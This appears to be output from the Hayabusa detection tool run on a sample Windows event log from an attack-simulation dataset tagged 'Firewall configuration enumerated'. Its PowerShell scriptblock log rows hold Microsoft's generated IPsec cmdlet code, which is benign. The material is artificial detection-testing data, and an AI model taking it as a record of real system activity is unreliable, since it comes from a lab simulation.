$__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase1AuthSet' function Copy-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmd",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"letization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 
+00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] 
